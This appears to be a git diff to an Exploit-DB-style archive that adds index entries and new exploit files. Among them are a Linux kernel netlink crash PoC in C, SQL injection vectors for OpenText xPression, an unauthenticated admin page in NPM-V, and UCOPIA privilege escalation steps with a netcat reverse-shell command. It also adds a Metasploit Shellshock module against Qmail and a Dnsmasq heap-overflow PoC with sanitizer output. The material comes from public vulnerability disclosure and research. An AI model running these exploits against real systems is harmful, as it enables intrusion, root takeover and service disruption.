diff --git a/files.csv b/files.csv
index 1c435b4d7..c82f7ff28 100644
--- a/files.csv
+++ b/files.csv
@@ -5690,6 +5690,13 @@ id,file,description,date,author,platform,type,port
 42783,platforms/multiple/dos/42783.txt,"Adobe Flash - Out-of-Bounds Read in applyToRange",2017-09-25,"Google Security Research",multiple,dos,0
 42917,platforms/windows/dos/42917.py,"DiskBoss Enterprise 8.4.16 - Local Buffer Overflow (PoC)",2017-09-28,"Touhid M.Shaikh",windows,dos,0
 42920,platforms/windows/dos/42920.py,"Trend Micro OfficeScan 11.0/XG (12.0) - Memory Corruption",2017-09-29,hyp3rlinx,windows,dos,0
+42932,platforms/linux/dos/42932.c,"Linux Kernel < 4.14.rc3  - Local Denial of Service",2017-10-02,"Wang Chenyu",linux,dos,0
+42941,platforms/multiple/dos/42941.py,"Dnsmasq < 2.78 - 2-byte Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42942,platforms/multiple/dos/42942.py,"Dnsmasq < 2.78 - Heap-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42943,platforms/multiple/dos/42943.py,"Dnsmasq < 2.78 - Stack-Based Overflow",2017-10-02,"Google Security Research",multiple,dos,0
+42944,platforms/multiple/dos/42944.py,"Dnsmasq < 2.78 - Information Leak",2017-10-02,"Google Security Research",multiple,dos,0
+42945,platforms/multiple/dos/42945.py,"Dnsmasq < 2.78 - Lack of free() Denial of Service",2017-10-02,"Google Security Research",multiple,dos,0
+42946,platforms/multiple/dos/42946.py,"Dnsmasq < 2.78 - Integer Underflow",2017-10-02,"Google Security Research",multiple,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@@ -9264,6 +9271,8 @@ id,file,description,date,author,platform,type,port
 42890,platforms/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,windows,local,0
 42918,platforms/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Buffer Overflow",2017-09-28,"Touhid M.Shaikh",windows,local,0
 42921,platforms/windows/local/42921.py,"Dup Scout Enterprise 10.0.18 - 'Import Command' Buffer Overflow",2017-09-29,"Touhid M.Shaikh",windows,local,0
+42936,platforms/linux/local/42936.txt,"UCOPIA Wireless Appliance < 5.1.8 - Privilege Escalation",2017-10-02,Sysdream,linux,local,0
+42937,platforms/linux/local/42937.txt,"UCOPIA Wireless Appliance < 5.1.8 - Restricted Shell Escape",2017-10-02,Sysdream,linux,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15870,6 +15879,7 @@ id,file,description,date,author,platform,type,port
 42806,platforms/java/remote/42806.py,"Oracle WebLogic Server 10.3.6.0 - Java Deserialization",2017-09-27,SlidingWindow,java,remote,0
 42888,platforms/hardware/remote/42888.sh,"Cisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution",2017-09-27,"Adam Brown",hardware,remote,0
 42928,platforms/windows/remote/42928.py,"Sync Breeze Enterprise 10.0.28 - Buffer Overflow",2017-09-30,"Owais Mehtab",windows,remote,0
+42938,platforms/linux/remote/42938.rb,"Qmail SMTP - Bash Environment Variable Injection (Metasploit)",2017-10-02,Metasploit,linux,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -38610,3 +38620,8 @@ id,file,description,date,author,platform,type,port
 42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0
 42927,platforms/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps,0
 42931,platforms/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206  - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps,0
+42933,platforms/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",hardware,webapps,0
+42934,platforms/php/webapps/42934.txt,"phpCollab 2.5.1 - Arbitrary File Upload",2017-10-02,Sysdream,php,webapps,0
+42935,platforms/php/webapps/42935.txt,"phpCollab 2.5.1 - SQL Injection",2017-10-02,Sysdream,php,webapps,0
+42939,platforms/jsp/webapps/42939.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'jobRunId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
+42940,platforms/jsp/webapps/42940.txt,"OpenText Document Sciences xPression 4.5SP1 Patch 13 - 'documentId' SQL Injection",2017-10-02,"Marcin Woloszyn",jsp,webapps,0
diff --git a/platforms/hardware/webapps/42933.txt b/platforms/hardware/webapps/42933.txt
new file mode 100755
index 000000000..abdf91ddc
--- /dev/null
+++ b/platforms/hardware/webapps/42933.txt
@@ -0,0 +1,29 @@
+NPM-V(Network Power Manager) <= 2.4.1 Reset Password Vulnerability
+
+Author: Saeed reza Zamanian [penetrationtest @ Linkedin]
+Product: NPM-V
+Affected Version : 2.4.1 and below
+Vendor : http://www.china-clever.com
+Product Link : http://www.china-clever.com/en/index.php/product?view=products&cid=125
+Date: 2017 Sep 25
+Manual: ftp://support.danbit.dk/N/NPOWER8IEC-E/NPM-V%20User%20Manual.pdf
+
+
+[*] NPM Introduction:
+	The NPM(Network Power Manager) is a network manageable device that provides power monitoring,
+	controlling and managements to many equipments in the rack cabinet of data center all over the world through
+	LAN or WAN. For meeting with the restrictions and requirements in different environment, NPM supplies many
+	connection methods that user can manage it through its Web interface(HTTP or HTTPS), Serial connection, Telnet
+	or SNMP
+[*] Vulnerability Details:
+	Based on security Check on this device , Authentication doesn't check on Device Admin Console 
+	an attacker can access to management console pages directly and without authentication.
+	All files in these directories are directly accessible . /log/ /chart /device and /user .
+
+[*] PoC:
+	An Attacker can directly access to below page and Add User or View Password or Change Administrator credential without authentication.
+	if you browse this page you will see an html page likely the image exists on Page 13 (Figure 1-4) on Device Users Manual.
+	http://[Device IP]/user/user.html
+
+
+#EOF
\ No newline at end of file
diff --git a/platforms/jsp/webapps/42939.txt b/platforms/jsp/webapps/42939.txt
new file mode 100755
index 000000000..a568b009b
--- /dev/null
+++ b/platforms/jsp/webapps/42939.txt
@@ -0,0 +1,62 @@
+Title: OpenText Document Sciences xPression (formerly EMC Document
+Sciences xPression) - SQL Injection
+Author: Marcin Woloszyn
+Date: 27. September 2017
+CVE: CVE-2017-14758
+
+Affected Software:
+==================
+OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
+
+Exploit was tested on:
+======================
+v4.5SP1 Patch 13 (older versions might be affected as well)
+
+SQL Injection:
+==============
+
+Due to lack of prepared statements an application is prone to SQL
+Injection attacks.
+Potential attacker can retrieve data from application database by
+exploiting the issue.
+
+Vector :
+--------
+
+True: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=1
+False: http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153+and+1=2
+
+Additionally:
+
+http://[...]/xDashboard/html/jobhistory/downloadSupportFile.action?jobRunId=1502642747222443244706554841153aaa
+
+Results in the following error in response:
+
+HTTP/1.1 200 OK
+[...]
+  <b>Errors:&nbsp;</b>
+
+  See nested exception&#x3b; nested exception is&#x3a;
+java.lang.RuntimeException&#x3a;
+com.dsc.uniarch.cr.error.CRException&#x3a; CRReportingSL&#x3a; Method
+getJobRunsByIds did not succeed because of a database operation
+failure.&#x3b;
+&#x9;---> nested com.dsc.uniarch.cr.error.CRSyntaxException&#x3a;
+Database syntax error &#x3a;SELECT  JOBRUN_ID, JOB_NAME,
+PUBLISH_PROFILE, PUBLISH_TYPE, START_TIME, END_TIME, HAS_DISTRIBUTION,
+DISTRIBUTION_NUMBER, STATUS, ERROR, REPORTING_LEVEL, THREAD_ID, JOB_ID
+FROM T_JOBRUN WHERE
+JOBRUN_ID&#x3d;1502642747222443244706554841153aaa.&#x3b;
+&#x9;---> nested java.sql.SQLSyntaxErrorException&#x3a;
+ORA-00933&#x3a; SQL command not properly ended
+
+An attacker can see whole query and injection point. This can also be
+used for error-based data extraction.
+
+Fix:
+====
+https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
+
+Contact:
+========
+mw[at]nme[dot]pl
\ No newline at end of file
diff --git a/platforms/jsp/webapps/42940.txt b/platforms/jsp/webapps/42940.txt
new file mode 100755
index 000000000..c7e1bdeae
--- /dev/null
+++ b/platforms/jsp/webapps/42940.txt
@@ -0,0 +1,37 @@
+Title: OpenText Document Sciences xPression (formerly EMC Document
+Sciences xPression) - SQL Injection
+Author: Marcin Woloszyn
+Date: 27. September 2017
+CVE: CVE-2017-14757
+
+Affected Software:
+==================
+OpenText Document Sciences xPression (formerly EMC Document Sciences xPression)
+
+Exploit was tested on:
+======================
+v4.5SP1 Patch 13 (older versions might be affected as well)
+
+SQL Injection:
+==============
+
+Due to lack of prepared statements an application is prone to SQL
+Injection attacks.
+Potential attacker can retrieve data from application database by
+exploiting the issue.
+
+Vector :
+--------
+
+https://[...]/xAdmin/html/cm_doclist_view_uc.jsp?cat_id=503&documentId=185365177756%20and%201=1&documentType=xDesignPublish&documentName=ContractRealEstate
+
+            ^
+Results can be retrieved using blind SQL injection method.
+
+Fix:
+====
+https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774
+
+Contact:
+========
+mw[at]nme[dot]pl
\ No newline at end of file
diff --git a/platforms/linux/dos/42932.c b/platforms/linux/dos/42932.c
new file mode 100755
index 000000000..8b55e6e35
--- /dev/null
+++ b/platforms/linux/dos/42932.c
@@ -0,0 +1,145 @@
+# Exploit Title: Linux Kernel<4.14.rc3 Local Denial of Service
+# Date: 2017-Oct-02
+# Exploit Author: Wang Chenyu (Nanyang Technological University)
+# Version:Linux kernel 4-14-rc1
+# Tested on:Ubuntu 16.04 desktop amd64
+# CVE : CVE-2017-14489
+# CVE description: This CVE is assigned to Wang Chunyu (Red Hat) and
+discovered by Syzkaller. Provided for legal security research and testing
+purposes ONLY.
+In this POC, skb_shinfo(SKB)->nr_frags was overwritten by ev->iferror = err
+(0xff) in the condition where nlh->nlmsg_len==0x10 and skb->len >
+nlh->nlmsg_len.
+
+
+POC:
+#include <sys/socket.h>
+#include <linux/netlink.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+
+#define NETLINK_USER 31
+
+#define MAX_PAYLOAD 1024 /* maximum payload size*/
+struct sockaddr_nl src_addr, dest_addr;
+struct nlmsghdr *nlh = NULL;
+struct iovec iov;
+int sock_fd;
+struct msghdr msg;
+
+int main()
+{
+sock_fd=socket(PF_NETLINK, SOCK_RAW, NETLINK_ISCSI);
+if(sock_fd<0)
+return -1;
+
+memset(&src_addr, 0, sizeof(src_addr));
+src_addr.nl_family = AF_NETLINK;
+src_addr.nl_pid = getpid(); /* self pid */
+
+bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr));
+
+memset(&dest_addr, 0, sizeof(dest_addr));
+memset(&dest_addr, 0, sizeof(dest_addr));
+dest_addr.nl_family = AF_NETLINK;
+dest_addr.nl_pid = 0; /* For Linux Kernel */
+dest_addr.nl_groups = 0; /* unicast */
+
+nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD));
+memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD));
+nlh->nlmsg_len = 0xac;
+nlh->nlmsg_pid = getpid();
+nlh->nlmsg_flags = 0;
+
+strcpy(NLMSG_DATA(nlh), "ABCDEFGHabcdefghABCDEFGHabcdef
+ghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHabcdefghABCDEFGHab
+cdefghAAAAAAAAAAAAAAAABBBBBBBBBBBBBBBBCCCCCCCCCCCCCCCCDDDDDDDDDDDD\x10");
+
+iov.iov_base = (void *)nlh;
+iov.iov_len = 0xc0;
+msg.msg_name = (void *)&dest_addr;
+msg.msg_namelen = sizeof(dest_addr);
+msg.msg_iov = &iov;
+msg.msg_iovlen = 1;
+
+printf("Sending message to kernel\n");
+sendmsg(sock_fd,&msg,0);
+printf("Waiting for message from kernel\n");
+
+/* Read message from kernel */
+recvmsg(sock_fd, &msg, 0);
+printf("Received message payload: %s\n", (char *)NLMSG_DATA(nlh));
+close(sock_fd);
+}
+
+
+Crash info:
+[   17.880629] BUG: unable to handle kernel NULL pointer dereference at
+0000000000000028
+[   17.881586] IP: skb_release_data+0x77/0x110
+[   17.882093] PGD 7b02a067 P4D 7b02a067 PUD 7b02b067 PMD 0
+[   17.882743] Oops: 0002 [#1] SMP
+[   17.883123] Modules linked in:
+[   17.883493] CPU: 1 PID: 2687 Comm: test02 Not tainted 4.14.0-rc1+ #1
+[   17.884251] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS
+Ubuntu-1.8.2-1ubuntu1 04/01/2014
+[   17.885350] task: ffff88007c5a1900 task.stack: ffffc90000e10000
+[   17.886058] RIP: 0010:skb_release_data+0x77/0x110
+[   17.886590] RSP: 0018:ffffc90000e13c08 EFLAGS: 00010202
+[   17.887213] RAX: 000000000000000d RBX: ffff88007bd50300 RCX:
+ffffffff820f96a0
+[   17.888059] RDX: 000000000000000c RSI: 0000000000000010 RDI:
+000000000000000c
+[   17.888893] RBP: ffffc90000e13c20 R08: ffffffff820f9860 R09:
+ffffc90000e13ad8
+[   17.889712] R10: ffffea0001ef5400 R11: ffff88007d001700 R12:
+0000000000000000
+[   17.890349] R13: ffff88007be710c0 R14: 00000000000000c0 R15:
+0000000000000000
+[   17.890977] FS:  00007f7614d4c700(0000) GS:ffff88007fd00000(0000)
+knlGS:0000000000000000
+[   17.891592] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
+[   17.892054] CR2: 0000000000000028 CR3: 000000007b022000 CR4:
+00000000000006e0
+[   17.892629] Call Trace:
+[   17.892833]  skb_release_all+0x1f/0x30
+[   17.893140]  consume_skb+0x27/0x90
+[   17.893418]  netlink_unicast+0x16a/0x210
+[   17.893735]  netlink_sendmsg+0x2a3/0x390
+[   17.894050]  sock_sendmsg+0x33/0x40
+[   17.894336]  ___sys_sendmsg+0x29e/0x2b0
+[   17.894650]  ? __wake_up_common_lock+0x7a/0x90
+[   17.895009]  ? __wake_up+0xe/0x10
+[   17.895280]  ? tty_write_unlock+0x2c/0x30
+[   17.895606]  ? tty_ldisc_deref+0x11/0x20
+[   17.895925]  ? n_tty_open+0xd0/0xd0
+[   17.896211]  ? __vfs_write+0x23/0x130
+[   17.896512]  __sys_sendmsg+0x40/0x70
+[   17.896805]  ? __sys_sendmsg+0x40/0x70
+[   17.897133]  SyS_sendmsg+0xd/0x20
+[   17.897408]  entry_SYSCALL_64_fastpath+0x13/0x94
+[   17.897783] RIP: 0033:0x7f7614886320
+[   17.898186] RSP: 002b:00007fff6f17f9c8 EFLAGS: 00000246 ORIG_RAX:
+000000000000002e
+[   17.898793] RAX: ffffffffffffffda RBX: 00007f7614b2e7a0 RCX:
+00007f7614886320
+[   17.899368] RDX: 0000000000000000 RSI: 0000000000600fc0 RDI:
+0000000000000003
+[   17.899943] RBP: 0000000000000053 R08: 00000000ffffffff R09:
+0000000000000000
+[   17.900521] R10: 0000000000000000 R11: 0000000000000246 R12:
+0000000000400b9e
+[   17.901095] R13: 00007f7614d50000 R14: 0000000000000019 R15:
+0000000000400b9e
+[   17.901672] Code: 45 31 e4 41 80 7d 02 00 48 89 fb 74 32 49 63 c4 48 83
+c0 03 48 c1 e0 04 49 8b 7c 05 00 48 8b 47 20 48 8d 50 ff a8 01 48 0f 45 fa
+<f0> ff 4f 1c 74 7a 41 0f b6 45 02 41 83 c4 01 44 39 e0 7f ce 49
+[   17.903190] RIP: skb_release_data+0x77/0x110 RSP: ffffc90000e13c08
+[   17.903689] CR2: 0000000000000028
+[   17.903980] ---[ end trace 2f1926fbc1d32679 ]---
+
+
+Reference:
+[1] https://patchwork.kernel.org/patch/9923803/
+[2] https://github.com/google/syzkaller
diff --git a/platforms/linux/local/42936.txt b/platforms/linux/local/42936.txt
new file mode 100755
index 000000000..88c3f157e
--- /dev/null
+++ b/platforms/linux/local/42936.txt
@@ -0,0 +1,79 @@
+# [CVE-2017-11322] UCOPIA Wireless Appliance < 5.1.8 Privileges Escalation
+
+## Asset description
+
+UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
+
+More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
+
+The affected asset in this report is a WiFi management appliance.
+
+## Vulnerability
+
+CHROOT escape and privileges escalation.
+
+**Threat**
+
+Improper sanitization of system commands in the chroothole_client executable in UCOPIA Wireless Appliance, prior to 5.1.8, allows local attackers to elevate privileges to root user and escape from the *chroot*.
+
+**CVE ID**: CVE-2017-11322
+
+**Access Vector**: local
+
+**Security Risk**: high
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 8.2 (High)
+
+**CVSS Vector**: CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept: chroot escape / privileges escalation
+
+The **chroothole_client** binary is used by the appliance to run programs outside the *chroot*, as the **root** user.
+
+Because of an improper sanitization of system commands, we managed to gain a complete **root** access to the appliance, outside the *chroot*.
+
+```
+$ chroothole_client '/usr/sbin/status'
+is not running ... failed !
+$ chroothole_client '/usr/sbin/status $(which nc)'
+/bin/nc is not running ... failed!
+$ chroothole_client '/usr/sbin/status $(nc 10.0.0.125 4444 -e /bin/sh)'
+```
+
+Attacker terminal :
+
+```
+$ ncat -lvp 4444
+Ncat: Listening on 0.0.0.0:4444
+Ncat: Connection from 10.0.0.1:49156.
+whoami
+root
+```
+
+## Solution
+
+Update to UCOPIA 5.1.8
+
+## Timeline (dd/mm/yyyy)
+
+* 08/03/2017 : Vulnerability discovery.
+* 03/05/2017 : Initial contact.
+* 10/05/2017 : GPG Key exchange.
+* 10/05/2017 : Advisory sent to vendor.
+* 17/05/2017 : Request for feedback.
+* 22/05/2017 : Vendor acknowledge the vulnerabilities.
+* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
+* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
+
+-- 
+SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
\ No newline at end of file
diff --git a/platforms/linux/local/42937.txt b/platforms/linux/local/42937.txt
new file mode 100755
index 000000000..828ad50c7
--- /dev/null
+++ b/platforms/linux/local/42937.txt
@@ -0,0 +1,90 @@
+# [CVE-2017-11321] UCOPIA Wireless Appliance < 5.1.8 Restricted Shell Escape
+
+## Asset Description
+
+UCOPIA solutions bring together a combination of software, appliance and cloud services serving small to large customers.
+
+More than 12,000 UCOPIA solutions are deployed and maintained by UCOPIA expert partners all over the world.
+
+The affected asset in this report is a WiFi management appliance.
+
+
+## Vulnerability
+
+Shell Escape via `less` command.
+
+**Threat**
+
+Improper sanitization of system commands in the restricted shell interface in UCOPIA Wireless Appliance, prior to 5.1.8, allows remote attackers to gain access to a system shell as the "admin" user.
+
+**CVE ID**: CVE-2017-11321
+
+**Access Vector**: network
+
+**Security Risk**: critical
+
+**Vulnerability**: CWE-78
+
+**CVSS Base Score**: 9.1 (Critical)
+
+**CVSS Vector**: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
+
+### Proof of Concept: Restricted Shell Escape
+
+By default, the UCOPIA wireless appliances exposes two shell access on port 22 (SSH) and 222 (ShellInTheBox).
+
+A documented **admin** user exists on the system with the password **bhu85tgb**.
+
+Quoted from the documentation :
+
+> You can also retrieve the IP address of the outgoing interface. For this, you need to log in to the terminal of the virtual machine with
+the following username and password: admin/bhu85tgb, and then execute the interface command.
+
+By logging in within these interfaces, we can access to a restricted shell (*clish*) that allows only a few commands.
+
+However, the `less` command is allowed, and because `less` allows to execute shell commands when viewing a file, we can use it to escape the restricted shell.
+
+Steps :
+
+**1/** Login to the appliance using SSH or ShellInTheBox.
+
+**2/** Run the `less /etc/passwd` command.
+
+**3/** When viewing the file, type `!sh`
+
+**4/** You now have unrestricted `admin` user access to the appliance.
+
+```
+> less /etc/passwd
+!sh
+$ ls /
+bin dev etc home lib proc tmp user
+$ whoami
+admin
+```
+
+## Solution
+
+Update to UCOPIA 5.1.8
+
+## Timeline (dd/mm/yyyy)
+
+* 08/03/2017 : Vulnerability discovery.
+* 03/05/2017 : Initial contact.
+* 10/05/2017 : GPG Key exchange.
+* 10/05/2017 : Advisory sent to vendor.
+* 17/05/2017 : Request for feedback.
+* 22/05/2017 : Vendor acknowledge the vulnerabilities.
+* 21/06/2017 : Sysdream Labs request for an ETA, warning for public disclosure.
+* 21/06/2017 : Vendor say that the UCOPIA 5.1.8 fixes the issue.
+* 29/09/2017 : Public disclosure.
+
+## Credits
+
+* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)
+
+-- 
+SYSDREAM Labs <labs@sysdream.com> 
+GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 
+* Website: https://sysdream.com/ 
+* Twitter: @sysdream 
\ No newline at end of file
diff --git a/platforms/linux/remote/42938.rb b/platforms/linux/remote/42938.rb
new file mode 100755
index 000000000..4c2dedfbb
--- /dev/null
+++ b/platforms/linux/remote/42938.rb
@@ -0,0 +1,109 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Smtp
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => 'Qmail SMTP Bash Environment Variable Injection (Shellshock)',
+      'Description'    => %q{
+        This module exploits a shellshock vulnerability on Qmail, a public
+        domain MTA written in C that runs on Unix systems.
+        Due to the lack of validation on the MAIL FROM field, it is possible to
+        execute shell code on a system with a vulnerable BASH (Shellshock).
+        This flaw works on the latest Qmail versions (qmail-1.03 and
+        netqmail-1.06).
+        However, in order to execute code, /bin/sh has to be linked to bash
+        (usually default configuration) and a valid recipient must be set on the
+        RCPT TO field (usually admin@exampledomain.com).
+        The exploit does not work on the "qmailrocks" community version
+        as it ensures the MAILFROM field is well-formed.
+      },
+      'Author'         =>
+        [
+          'Mario Ledo (Metasploit module)',
+          'Gabriel Follon (Metasploit module)',
+          'Kyle George (Vulnerability discovery)'
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2014-6271'],
+          ['CWE', '94'],
+          ['OSVDB', '112004'],
+          ['EDB', '34765'],
+          ['URL', 'http://seclists.org/oss-sec/2014/q3/649'],
+          ['URL', 'https://lists.gt.net/qmail/users/138578']
+        ],
+      'Payload'        =>
+        {
+          'BadChars' => "\x3e",
+          'Space'       => 888,
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+              'RequiredCmd' => 'generic telnet perl ruby python'
+              # telnet ruby python and perl works only if installed on target
+            }
+        },
+      'Targets'        => [ [ 'Automatic', { }] ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Sep 24 2014'
+    ))
+
+    deregister_options('MAILFROM')
+  end
+
+  def smtp_send(data = nil)
+    begin
+      result = ''
+      code = 0
+      sock.put("#{data}")
+      result = sock.get_once
+      result.chomp! if (result)
+      code = result[0..2].to_i if result
+      return result, code
+    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
+      return result, 0
+    rescue ::Exception => e
+      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
+      return nil, 0
+    end
+  end
+
+  def exploit
+    to = datastore['MAILTO']
+    connect
+    result = smtp_send("HELO localhost\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    print_status('Sending the payload...')
+    result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    print_status("Sending RCPT TO #{to}")
+    result = smtp_send("rcpt to:<#{to}>\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    result = smtp_send("data\r\n")
+    if result[1] < 200 || result[1] > 354
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
+    if result[1] < 200 || result[1] > 300
+      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
+    end
+    disconnect
+  end
+end
\ No newline at end of file
diff --git a/platforms/multiple/dos/42941.py b/platforms/multiple/dos/42941.py
new file mode 100755
index 000000000..6c8d9aece
--- /dev/null
+++ b/platforms/multiple/dos/42941.py
@@ -0,0 +1,205 @@
+'''
+Sources:
+https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14491.py
+https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
+
+1) Build the docker and open three terminals
+
+docker build -t dnsmasq .
+docker run --rm -t -i --name dnsmasq_test dnsmasq bash
+docker cp poc.py dnsmasq_test:/poc.py
+docker exec -it <container_id> bash
+docker exec -it <container_id> bash
+
+2) On one terminal let’s launch attacker controlled DNS server:
+
+# python poc.py  127.0.0.2 53
+Listening at 127.0.0.2:53
+
+3) On another terminal let’s launch dnsmasq forwarding queries to attacker controlled DNS:
+
+# /testing/dnsmasq/src/dnsmasq -p 53535 --no-daemon --log-queries -S 127.0.0.2 --no-hosts --no-resolv
+dnsmasq: started, version 2.78test2-8-ga3303e1 cachesize 150
+dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth no-DNSSEC loop-detect inotify
+dnsmasq: using nameserver 127.0.0.2#53
+dnsmasq: cleared cache
+
+4) Let’s fake a client making a request twice (or more) so we hit the dnsmasq cache:
+
+# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
+# dig @localhost -p 53535 -x 8.8.8.125 > /dev/null
+
+5)  The crash might not be triggered on the first try due to the non-deterministic order of the dnsmasq cache. Restarting dnsmasq and retrying should be sufficient to trigger a crash.
+
+==1159==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62200001dd0b at pc 0x0000005105e7 bp 0x7fff6165b9b0 sp 0x7fff6165b9a8
+WRITE of size 1 at 0x62200001dd0b thread T0
+    #0 0x5105e6 in add_resource_record /test/dnsmasq/src/rfc1035.c:1141:7
+    #1 0x5127c8 in answer_request /test/dnsmasq/src/rfc1035.c:1428:11
+    #2 0x534578 in receive_query /test/dnsmasq/src/forward.c:1439:11
+    #3 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
+    #4 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
+    #5 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+    #6 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
+
+0x62200001dd0b is located 0 bytes to the right of 5131-byte region [0x62200001c900,0x62200001dd0b)
+allocated by thread T0 here:
+    #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
+    #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
+    #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
+    #3 0x7fdf4b3972b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
+
+SUMMARY: AddressSanitizer: heap-buffer-overflow /test/dnsmasq/src/rfc1035.c:1141:7 in add_resource_record
+Shadow bytes around the buggy address:
+  0x0c447fffbb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c447fffbb60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c447fffbb70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+  0x0c447fffbb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
